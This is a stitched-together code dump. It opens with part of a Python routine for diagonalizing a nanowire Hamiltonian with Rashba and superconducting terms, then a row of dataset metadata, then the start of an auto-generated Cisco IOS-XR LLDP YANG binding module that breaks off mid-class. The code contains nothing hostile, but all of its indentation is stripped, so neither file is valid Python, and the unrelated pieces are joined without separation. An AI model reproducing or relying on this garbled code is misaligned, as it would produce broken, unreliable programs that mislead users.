Distance (in nm) between sites.
mu: float or arr
On-site chemical potential. If it is float, the chemical potential
is the same in every site, while if it is a 3D array, it is the
on-site chemical potential.
aR: float or arr
Rashba coupling.
-If aR is a float, the same constant aR is added in the z direction
in each site and in every diagonalization step.
-If aR is a 1D array of length=3, each element of the array is the
(constant) Rashba coupling in each direction, which is added in
every diagonalization step.
-If aR is a 3D array (3 x (N)), each element of the array aR[i] is
the Rashba coupling in each direction, whose matrix alements are
the on-site Rashba couplings.
d: float or arr
On-site supercondcuting pairing amplitude. If it is float, the
pairing is the same in every site, while if it is a 3D array,
it is the on-site pairing.
n_eig: int
If sparse=="yes", n_eig is the number of eigenvalues you want to
obtain. If BdG=='yes', these eigenvalues are obtained around zero
energy, whil if BdG=='no' these eigenvalues correspond to the
lowest-energy eigenstates. This can be changed with the near option.
n_orb: int
Number of molecular orbitals to include in the projection.
Nxp: int
Number of points to compute the molecular orbitals of the H_2D. For
the remaining (N[0]-Nxp) slices, it is considered that the
molecular orbitals corresponding to the first (N[0]-Nxp)/2 slices
are the same than for the slice N[Nxp]. Similarly, it is considered
that for the last (N[0]-Nxp)/2 slices, the molecular orbitals are
the same than that of N[N[0]-Nxp].
sparse: {"yes","no"}
Sparsety of the 2D Hamilonain. "yes" solves the Hamiltonian looking
for only n_eig eigenvalues, while "no" finds all.
section: {"rectangular","hexagonal"}
Whether the system have a rectangular or hexagonal cross-section
in the plane zy.
BdG: {"yes","no"}
If BdG is "yes", it is solved the Hamiltonian in the Bogoliubov-de
Gennes formalism.
Returns
-------
E_3D: arr (n_eig)
Eigevalues (energies), ordered from smaller to larger.
U_1D: arr ((2 x N[0]) x n_eig)*(BdG=='yes') + ((N[0]) x n_eig)*(BdG=='no')
Eigenvectors of the effective 1D problem.
U_2D: arr ((2 x N[1] x N[2] x N[0]) x (n_orb x N[0]))
Eigenvectors of the 2D slices in each point along the wire.
"""
#Obtain dimensions:
Nx, Ny, Nz = N[0], N[1], N[2]
if np.ndim(dis)==0:
dis_x, dis_y, dis_z = dis, dis, dis
else:
dis_x, dis_y, dis_z = dis[0], dis[1], dis[2]
if not(Nxp==None or Nxp==N[0]):
N_dif=np.int((Nx-Nxp)/2)
else:
Nxp, N_dif = Nx, 0
m = int(2 * Nx * Ny * Nz)
#Make sure that the onsite parameters are arrays:
if BdG=='no':
H_2D,H_3D=H
elif BdG=='yes':
H_2D,H_3D,H_SC=H
if np.isscalar(mu):
mu = mu * np.ones((Nx,Ny,Nz))
else:
if len(mu[:,0,0])<Nx and len(mu[:,0,0])==Nxp:
mu_temp=np.zeros((Nx,Ny,Nz))
for i in range(Nx):
if i<=N_dif:
mu_temp[i,:,:]=mu[0,:,:]
elif i>=(Nx-N_dif):
mu_temp[i,:,:]=mu[-1,:,:]
else:
mu_temp[i,:,:]=mu[i-N_dif,:,:]
mu=mu_temp
if not(isinstance(aR,str) or isinstance(aR,dict)):
if np.ndim(aR)==0:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=aR*np.ones((Nx,Ny,Nz))
elif np.ndim(aR)==1:
if len(aR)==3:
aRx=aR[0]*np.ones((Nx,Ny,Nz))
aRy=aR[1]*np.ones((Nx,Ny,Nz))
aRz=aR[2]*np.ones((Nx,Ny,Nz))
else:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=aR*np.ones((Nx,Ny,Nz))
else:
aRx=aR[0]
aRy=aR[1]
aRz=aR[2]
else:
aRx=np.zeros((Nx,Ny,Nz))
aRy=np.zeros((Nx,Ny,Nz))
aRz=np.zeros((Nx,Ny,Nz))
if np.isscalar(d) and not(d==0) and BdG=='yes':
d = d * np.ones((Nx,Ny,Nz))
#Add new value:
if not(isinstance(aR,str) or isinstance(aR,dict)) and not((aRy==0).all() and (aRz==0).all()):
aRy_kx, aRz_kx = np.repeat(((aRy[1::,:,:]+aRy[:-1,:,:])/(4*dis_x)).flatten(),2), ((aRz[1::,:,:]+aRz[:-1,:,:])/(4*dis_x)).flatten()
aRy_kx[1::2] = -aRy_kx[::2]
H_3D[diagonal(m,k=2*Ny*Nz)] += -1j*aRy_kx
H_3D[diagonal(m,k=-2*Ny*Nz)] += +1j*aRy_kx
H_3D[diagonal(m,k=2*Ny*Nz-1,step=2,init=1)] += -aRz_kx
H_3D[diagonal(m,k=-2*Ny*Nz+1,step=2,init=1)] += -aRz_kx
H_3D[diagonal(m,k=1+2*Ny*Nz,step=2)] += aRz_kx
H_3D[diagonal(m,k=-1-2*Ny*Nz,step=2)] += aRz_kx
if not(np.isscalar(d)) and BdG=='yes':
d=d.flatten()
H_SC[diagonal(m,k=1,step=2)] += -np.conj(d)
H_SC[diagonal(m,k=-1,step=2)] += np.conj(d)
#Obtain the orbital basis:
E_2D, U_2D = np.zeros(n_orb * Nx), scipy.sparse.dok_matrix((m,int(n_orb * Nx)),dtype=complex)
for i in range(Nx):
if i<N_dif:
continue
elif (i>=N_dif) and (i<=(Nx-N_dif)):
if sparse=='no':
E_temp, U_temp = LO_2D_solver_NoSC(H_2D[i-N_dif].todense(),N[1::],dis[1::],mu=mu[i,:,:],B=0,aR=np.array([aRx[i,:,:],aRy[i,:,:],aRz[i,:,:]]),space='position',sparse='no',section=section)
E_2D[i*n_orb:(i+1)*n_orb], U_2D[2 * Ny * Nz * i:2 * Ny * Nz * (i+1),i*n_orb:(i+1)*n_orb] = order_eig(E_temp[0:n_orb],U_temp[:,0:n_orb],sparse='no',BdG='no')
elif sparse=='yes':
E_temp, U_temp = LO_2D_solver_NoSC(H_2D[i-N_dif],N[1::],dis[1::],mu=mu[i,:,:],B=0,aR=np.array([aRx[i,:,:],aRy[i,:,:],aRz[i,:,:]]),space='position',sparse='yes',n_eig=n_orb,section=section)
E_2D[i*n_orb:(i+1)*n_orb], U_2D[2 * Ny * Nz * i:2 * Ny * Nz * (i+1),i*n_orb:(i+1)*n_orb] = order_eig(E_temp,U_temp,BdG='no')
if i==N_dif:
for j in range(N_dif):
E_2D[j*n_orb:(j+1)*n_orb], U_2D[2 * Ny * Nz * j:2 * Ny * Nz * (j+1),j*n_orb:(j+1)*n_orb] = E_2D[N_dif*n_orb:(N_dif+1)*n_orb], U_2D[2 * Ny * Nz * N_dif:2 * Ny * Nz * (N_dif+1),N_dif*n_orb:(N_dif+1)*n_orb]
elif i>(Nx-N_dif):
E_2D[i*n_orb:(i+1)*n_orb], U_2D[2 * Ny * Nz * i:2 * Ny * Nz * (i+1),i*n_orb:(i+1)*n_orb] = E_2D[(Nx-N_dif)*n_orb:((Nx-N_dif)+1)*n_orb], U_2D[2 * Ny * Nz * (Nx-N_dif):2 * Ny * Nz * ((Nx-N_dif)+1),(Nx-N_dif)*n_orb:((Nx-N_dif)+1)*n_orb]
#Obtain the effective multiorbital 1D Hamiltonian:
H_1D=(U_2D.transpose().conjugate()).dot(H_3D.dot(U_2D))+scipy.sparse.diags(E_2D)
#Include the SC:
if BdG=='yes':
H_1D_SC=((U_2D.transpose().conjugate()).dot(H_SC.dot(U_2D.conjugate())))
H_1D=scipy.sparse.vstack([scipy.sparse.hstack([H_1D,H_1D_SC]),scipy.sparse.hstack([np.transpose(np.conj(H_1D_SC)),-np.conj(H_1D)])])
#Diagonalize the effective 1D Hamiltonian:
if BdG=='no':
E_3D,U_1D = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_1D),k = n_eig, which='SA',tol=1e-5)
else:
E_3D,U_1D = scipy.sparse.linalg.eigsh(scipy.sparse.csc_matrix(H_1D),k = n_eig,sigma=0, which='LM',tol=1e-5)
#Project the eigenvector into the original basis:
if BdG=='yes':
zeros=scipy.sparse.dok_matrix((m,int(n_orb * Nx)),dtype=complex)
U_2D_SC=scipy.sparse.vstack([scipy.sparse.hstack([U_2D,zeros]),scipy.sparse.hstack([zeros,np.conj(U_2D)])])
U_3D=((U_2D_SC.dot(scipy.sparse.csc_matrix(U_1D))).todense()).A
E_3D,U_3D=order_eig(E_3D,U_3D,sparse='yes',BdG='no')
elif BdG=='no':
U_3D=((U_2D.dot(scipy.sparse.csc_matrix(U_1D))).todense()).A
E_3D,U_3D=order_eig(E_3D,U_3D,sparse='yes',BdG='yes')
return (E_3D,U_3D)
| 44.048405 | 245 | 0.517433 | 13,156 | 80,080 | 3.070082 | 0.026604 | 0.009309 | 0.021292 | 0.011587 | 0.944293 | 0.938203 | 0.930602 | 0.926814 | 0.921218 | 0.913815 | 0 | 0.034881 | 0.306194 | 80,080 | 1,817 | 246 | 44.072647 | 0.692081 | 0.346791 | 0 | 0.754738 | 0 | 0 | 0.020978 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007804 | false | 0 | 0.007804 | 0 | 0.023411 | 0.001115 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1c071d8d907db1a439134b34c7fb17b38befd594 | 171,036 | py | Python | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ethernet_lldp_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ethernet_lldp_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ethernet_lldp_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | """ Cisco_IOS_XR_ethernet_lldp_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR ethernet\-lldp package operational data.
This module contains definitions
for the following management objects\:
lldp\: Link Layer Discovery Protocol operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class LldpL3AddrProtocol(Enum):
    """
    LldpL3AddrProtocol (Enum Class)

    Layer-3 protocol of an LLDP management address.

    .. data:: ipv4 = 0

        IPv4

    .. data:: ipv6 = 1

        IPv6

    """

    # Enum members are ydk YLeaf wrappers: (numeric YANG value, identifier).
    ipv4 = Enum.YLeaf(0, "ipv4")

    ipv6 = Enum.YLeaf(1, "ipv6")
class Lldp(Entity):
"""
Link Layer Discovery Protocol operational data
.. attribute:: global_lldp
Global LLDP data
**type**\: :py:class:`GlobalLldp <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.GlobalLldp>`
.. attribute:: nodes
Per node LLDP operational data
**type**\: :py:class:`Nodes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
    def __init__(self):
        """Set up YANG metadata and instantiate the two child containers.

        NOTE(review): attribute order appears significant — ``self._is_frozen
        = True`` is kept last, since the overridden ``__setattr__`` routes
        writes through the ydk validation hook; confirm before reordering.
        """
        super(Lldp, self).__init__()
        self._top_entity = None  # cache for the top-level entity lookup

        # YANG bookkeeping consumed by the ydk runtime for path resolution.
        self.yang_name = "lldp"
        self.yang_parent_name = "Cisco-IOS-XR-ethernet-lldp-oper"
        self.is_top_level_class = True
        self.has_list_ancestor = False
        self.ylist_key_names = []
        # Maps YANG child names to (python attribute name, child class).
        self._child_classes = OrderedDict([("global-lldp", ("global_lldp", Lldp.GlobalLldp)), ("nodes", ("nodes", Lldp.Nodes))])
        self._leafs = OrderedDict()  # no leaf nodes at this level

        # Eagerly create both child containers and register them.
        self.global_lldp = Lldp.GlobalLldp()
        self.global_lldp.parent = self
        self._children_name_map["global_lldp"] = "global-lldp"

        self.nodes = Lldp.Nodes()
        self.nodes.parent = self
        self._children_name_map["nodes"] = "nodes"
        self._segment_path = lambda: "Cisco-IOS-XR-ethernet-lldp-oper:lldp"
        self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp, [], name, value)
    class GlobalLldp(Entity):
        """
        Global LLDP data

        .. attribute:: lldp_info

            The LLDP Global Information of this box

            **type**\: :py:class:`LldpInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.GlobalLldp.LldpInfo>`

        """

        _prefix = 'ethernet-lldp-oper'
        _revision = '2017-11-13'

        def __init__(self):
            """Initialize the container's YANG metadata and its LldpInfo child."""
            super(Lldp.GlobalLldp, self).__init__()

            # YANG bookkeeping consumed by the ydk runtime.
            self.yang_name = "global-lldp"
            self.yang_parent_name = "lldp"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("lldp-info", ("lldp_info", Lldp.GlobalLldp.LldpInfo))])
            self._leafs = OrderedDict()  # no leaf nodes at this level

            self.lldp_info = Lldp.GlobalLldp.LldpInfo()
            self.lldp_info.parent = self
            self._children_name_map["lldp_info"] = "lldp-info"
            self._segment_path = lambda: "global-lldp"
            self._absolute_path = lambda: "Cisco-IOS-XR-ethernet-lldp-oper:lldp/%s" % self._segment_path()
            self._is_frozen = True  # kept last: later writes go through the setattr hook

        def __setattr__(self, name, value):
            """Delegate attribute writes to the ydk validating setattr hook."""
            self._perform_setattr(Lldp.GlobalLldp, [], name, value)


        class LldpInfo(Entity):
            """
            The LLDP Global Information of this box

            .. attribute:: chassis_id

                Chassis identifier

                **type**\: str

            .. attribute:: chassis_id_sub_type

                Chassis ID sub type

                **type**\: int

                **range:** 0..255

            .. attribute:: system_name

                System Name

                **type**\: str

            .. attribute:: timer

                Rate at which LLDP packets are sent (in sec)

                **type**\: int

                **range:** 0..4294967295

            .. attribute:: hold_time

                Length of time (in sec) that the receiver must keep this packet

                **type**\: int

                **range:** 0..4294967295

            .. attribute:: re_init

                Delay (in sec) for LLDP initialization on any interface

                **type**\: int

                **range:** 0..4294967295

            """

            _prefix = 'ethernet-lldp-oper'
            _revision = '2017-11-13'

            def __init__(self):
                """Declare the global-info leafs and initialize them to None."""
                super(Lldp.GlobalLldp.LldpInfo, self).__init__()

                # YANG bookkeeping consumed by the ydk runtime.
                self.yang_name = "lldp-info"
                self.yang_parent_name = "global-lldp"
                self.is_top_level_class = False
                self.has_list_ancestor = False
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])  # leaf-only container
                # Leaf table: python name -> (YLeaf descriptor, accepted python types).
                self._leafs = OrderedDict([
                    ('chassis_id', (YLeaf(YType.str, 'chassis-id'), ['str'])),
                    ('chassis_id_sub_type', (YLeaf(YType.uint8, 'chassis-id-sub-type'), ['int'])),
                    ('system_name', (YLeaf(YType.str, 'system-name'), ['str'])),
                    ('timer', (YLeaf(YType.uint32, 'timer'), ['int'])),
                    ('hold_time', (YLeaf(YType.uint32, 'hold-time'), ['int'])),
                    ('re_init', (YLeaf(YType.uint32, 're-init'), ['int'])),
                ])
                # Leaf values start unset; the ydk runtime populates them on read.
                self.chassis_id = None
                self.chassis_id_sub_type = None
                self.system_name = None
                self.timer = None
                self.hold_time = None
                self.re_init = None
                self._segment_path = lambda: "lldp-info"
                self._absolute_path = lambda: "Cisco-IOS-XR-ethernet-lldp-oper:lldp/global-lldp/%s" % self._segment_path()
                self._is_frozen = True  # kept last: later writes go through the setattr hook

            def __setattr__(self, name, value):
                """Validate leaf writes via the ydk setattr hook."""
                self._perform_setattr(Lldp.GlobalLldp.LldpInfo, [u'chassis_id', u'chassis_id_sub_type', u'system_name', u'timer', u'hold_time', u're_init'], name, value)
class Nodes(Entity):
"""
Per node LLDP operational data
.. attribute:: node
The LLDP operational data for a particular node
**type**\: list of :py:class:`Node <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
        def __init__(self):
            """Initialize the keyed list container of per-node LLDP data."""
            super(Lldp.Nodes, self).__init__()

            # YANG bookkeeping consumed by the ydk runtime.
            self.yang_name = "nodes"
            self.yang_parent_name = "lldp"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("node", ("node", Lldp.Nodes.Node))])
            self._leafs = OrderedDict()  # no leaf nodes at this level

            self.node = YList(self)  # YANG list: zero or more Node entries
            self._segment_path = lambda: "nodes"
            self._absolute_path = lambda: "Cisco-IOS-XR-ethernet-lldp-oper:lldp/%s" % self._segment_path()
            self._is_frozen = True  # kept last: later writes go through the setattr hook
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes, [], name, value)
class Node(Entity):
"""
The LLDP operational data for a particular node
.. attribute:: node_name (key)
The identifier for the node
**type**\: str
**pattern:** ([a\-zA\-Z0\-9\_]\*\\d+/){1,2}([a\-zA\-Z0\-9\_]\*\\d+)
.. attribute:: neighbors
The LLDP neighbor tables on this node
**type**\: :py:class:`Neighbors <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors>`
.. attribute:: interfaces
The table of interfaces on which LLDP is running on this node
**type**\: :py:class:`Interfaces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Interfaces>`
.. attribute:: statistics
The LLDP traffic statistics for this node
**type**\: :py:class:`Statistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Statistics>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize a per-node 'node' list entry keyed by node-name."""
    super(Lldp.Nodes.Node, self).__init__()
    self.yang_name = "node"
    self.yang_parent_name = "nodes"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    # 'node_name' is the YANG list key for this entry.
    self.ylist_key_names = ['node_name']
    # Child containers reachable under this node.
    self._child_classes = OrderedDict([("neighbors", ("neighbors", Lldp.Nodes.Node.Neighbors)), ("interfaces", ("interfaces", Lldp.Nodes.Node.Interfaces)), ("statistics", ("statistics", Lldp.Nodes.Node.Statistics))])
    # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
    self._leafs = OrderedDict([
        ('node_name', (YLeaf(YType.str, 'node-name'), ['str'])),
    ])
    self.node_name = None  # key leaf, unset until assigned
    # Instantiate child containers and wire up their parent links.
    self.neighbors = Lldp.Nodes.Node.Neighbors()
    self.neighbors.parent = self
    self._children_name_map["neighbors"] = "neighbors"
    self.interfaces = Lldp.Nodes.Node.Interfaces()
    self.interfaces.parent = self
    self._children_name_map["interfaces"] = "interfaces"
    self.statistics = Lldp.Nodes.Node.Statistics()
    self.statistics.parent = self
    self._children_name_map["statistics"] = "statistics"
    # Keyed segment path: node[node-name='<key>'].
    self._segment_path = lambda: "node" + "[node-name='" + str(self.node_name) + "']"
    self._absolute_path = lambda: "Cisco-IOS-XR-ethernet-lldp-oper:lldp/nodes/%s" % self._segment_path()
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Validate writes against this entry's key leaf before applying."""
    key_leafs = ['node_name']
    self._perform_setattr(Lldp.Nodes.Node, key_leafs, name, value)
class Neighbors(Entity):
"""
The LLDP neighbor tables on this node
.. attribute:: devices
The detailed LLDP neighbor table on this device
**type**\: :py:class:`Devices <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices>`
.. attribute:: details
The detailed LLDP neighbor table
**type**\: :py:class:`Details <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details>`
.. attribute:: summaries
The LLDP neighbor summary table
**type**\: :py:class:`Summaries <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize the 'neighbors' container and its three child tables."""
    super(Lldp.Nodes.Node.Neighbors, self).__init__()
    self.yang_name = "neighbors"
    self.yang_parent_name = "node"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # YANG child name -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("devices", ("devices", Lldp.Nodes.Node.Neighbors.Devices)), ("details", ("details", Lldp.Nodes.Node.Neighbors.Details)), ("summaries", ("summaries", Lldp.Nodes.Node.Neighbors.Summaries))])
    self._leafs = OrderedDict()  # no leafs on this container
    # Instantiate child containers and wire up their parent links.
    self.devices = Lldp.Nodes.Node.Neighbors.Devices()
    self.devices.parent = self
    self._children_name_map["devices"] = "devices"
    self.details = Lldp.Nodes.Node.Neighbors.Details()
    self.details.parent = self
    self._children_name_map["details"] = "details"
    self.summaries = Lldp.Nodes.Node.Neighbors.Summaries()
    self.summaries.parent = self
    self._children_name_map["summaries"] = "summaries"
    # No _absolute_path: an ancestor list entry supplies the path prefix.
    self._segment_path = lambda: "neighbors"
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through YDK leaf validation for this entity."""
    leaf_names = []
    self._perform_setattr(Lldp.Nodes.Node.Neighbors, leaf_names, name, value)
class Devices(Entity):
"""
The detailed LLDP neighbor table on this
device
.. attribute:: device
Detailed information about a LLDP neighbor entry
**type**\: list of :py:class:`Device <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize the 'devices' container holding the per-device neighbor list."""
    super(Lldp.Nodes.Node.Neighbors.Devices, self).__init__()
    self.yang_name = "devices"
    self.yang_parent_name = "neighbors"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # YANG child name -> (python attribute name, binding class).
    self._child_classes = OrderedDict([("device", ("device", Lldp.Nodes.Node.Neighbors.Devices.Device))])
    self._leafs = OrderedDict()  # no leafs on this container
    # List of neighbor entries, one per neighboring device.
    self.device = YList(self)
    self._segment_path = lambda: "devices"
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through YDK leaf validation for this entity."""
    leaf_names = []
    self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices, leaf_names, name, value)
class Device(Entity):
"""
Detailed information about a LLDP neighbor
entry
.. attribute:: device_id
The neighboring device identifier
**type**\: str
.. attribute:: interface_name
The interface name
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: lldp_neighbor
lldp neighbor
**type**\: list of :py:class:`LldpNeighbor <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize a 'device' entry: identifier leafs plus its neighbor list."""
    super(Lldp.Nodes.Node.Neighbors.Devices.Device, self).__init__()
    self.yang_name = "device"
    self.yang_parent_name = "devices"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # Keyless YANG list: entries are addressed positionally.
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("lldp-neighbor", ("lldp_neighbor", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor))])
    # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
    self._leafs = OrderedDict([
        ('device_id', (YLeaf(YType.str, 'device-id'), ['str'])),
        ('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
    ])
    self.device_id = None
    self.interface_name = None
    # Neighbor records received from this device.
    self.lldp_neighbor = YList(self)
    self._segment_path = lambda: "device"
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Validate writes against this entry's leaf names before applying."""
    leaf_names = ['device_id', 'interface_name']
    self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device, leaf_names, name, value)
class LldpNeighbor(Entity):
"""
lldp neighbor
.. attribute:: detail
Detailed neighbor info
**type**\: :py:class:`Detail <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail>`
.. attribute:: mib
MIB neighbor info
**type**\: :py:class:`Mib <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib>`
.. attribute:: receiving_interface_name
Interface the neighbor entry was received on
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: receiving_parent_interface_name
Parent Interface the neighbor entry was received on
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: device_id
Device identifier
**type**\: str
.. attribute:: chassis_id
Chassis id
**type**\: str
.. attribute:: port_id_detail
Outgoing port identifier
**type**\: str
.. attribute:: header_version
Version number
**type**\: int
**range:** 0..255
.. attribute:: hold_time
Remaining hold time
**type**\: int
**range:** 0..65535
.. attribute:: enabled_capabilities
Enabled Capabilities
**type**\: str
.. attribute:: platform
Platform type
**type**\: str
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize an 'lldp-neighbor' record with its leafs and child containers."""
    super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor, self).__init__()
    self.yang_name = "lldp-neighbor"
    self.yang_parent_name = "device"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child containers: detailed neighbor info and MIB neighbor info.
    self._child_classes = OrderedDict([("detail", ("detail", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail)), ("mib", ("mib", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib))])
    # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
    self._leafs = OrderedDict([
        ('receiving_interface_name', (YLeaf(YType.str, 'receiving-interface-name'), ['str'])),
        ('receiving_parent_interface_name', (YLeaf(YType.str, 'receiving-parent-interface-name'), ['str'])),
        ('device_id', (YLeaf(YType.str, 'device-id'), ['str'])),
        ('chassis_id', (YLeaf(YType.str, 'chassis-id'), ['str'])),
        ('port_id_detail', (YLeaf(YType.str, 'port-id-detail'), ['str'])),
        ('header_version', (YLeaf(YType.uint8, 'header-version'), ['int'])),
        ('hold_time', (YLeaf(YType.uint16, 'hold-time'), ['int'])),
        ('enabled_capabilities', (YLeaf(YType.str, 'enabled-capabilities'), ['str'])),
        ('platform', (YLeaf(YType.str, 'platform'), ['str'])),
    ])
    # Leaf values start unset.
    self.receiving_interface_name = None
    self.receiving_parent_interface_name = None
    self.device_id = None
    self.chassis_id = None
    self.port_id_detail = None
    self.header_version = None
    self.hold_time = None
    self.enabled_capabilities = None
    self.platform = None
    # Instantiate child containers and wire up their parent links.
    self.detail = Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail()
    self.detail.parent = self
    self._children_name_map["detail"] = "detail"
    self.mib = Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib()
    self.mib.parent = self
    self._children_name_map["mib"] = "mib"
    self._segment_path = lambda: "lldp-neighbor"
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Validate writes against this record's leaf names before applying."""
    leaf_names = ['receiving_interface_name', 'receiving_parent_interface_name', 'device_id', 'chassis_id', 'port_id_detail', 'header_version', 'hold_time', 'enabled_capabilities', 'platform']
    self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor, leaf_names, name, value)
class Detail(Entity):
"""
Detailed neighbor info
.. attribute:: network_addresses
Management Addresses
**type**\: :py:class:`NetworkAddresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses>`
.. attribute:: peer_mac_address
Peer Mac Address
**type**\: str
**pattern:** [0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2}){5}
.. attribute:: port_description
Port Description
**type**\: str
.. attribute:: system_name
System Name
**type**\: str
.. attribute:: system_description
System Description
**type**\: str
.. attribute:: time_remaining
Time remaining
**type**\: int
**range:** 0..4294967295
.. attribute:: system_capabilities
System Capabilities
**type**\: str
.. attribute:: enabled_capabilities
Enabled Capabilities
**type**\: str
.. attribute:: auto_negotiation
Auto Negotiation
**type**\: str
.. attribute:: physical_media_capabilities
Physical media capabilities
**type**\: str
.. attribute:: media_attachment_unit_type
Media Attachment Unit type
**type**\: int
**range:** 0..4294967295
.. attribute:: port_vlan_id
Vlan ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize the 'detail' container of per-neighbor detailed attributes."""
    super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail, self).__init__()
    self.yang_name = "detail"
    self.yang_parent_name = "lldp-neighbor"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
